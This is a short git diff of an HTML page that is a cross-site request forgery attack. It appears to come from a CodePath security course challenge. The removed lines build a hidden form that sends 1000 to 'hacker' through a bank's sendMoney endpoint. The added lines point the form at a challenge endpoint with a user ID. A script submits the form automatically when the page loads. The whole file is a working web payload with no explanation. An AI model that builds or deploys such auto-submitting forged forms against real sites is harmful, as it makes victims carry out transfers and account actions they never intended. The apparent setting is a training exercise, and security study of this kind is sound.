--- a/index.html
+++ b/index.html
@@ -1,7 +1,5 @@
-<form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST">
- <input type="hidden" name="giveMoneyTo" value="hacker" />
- <input type="hidden" name="giveAmount" value="1000" />
- <input type="submit"/>
+<form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
+ <input type="hidden" name="userId" value="0bd2f88aab5e1900a79a59bf43329f83d64a22ae" />
 </form>
 <script>
  document.csrfForm.submit();
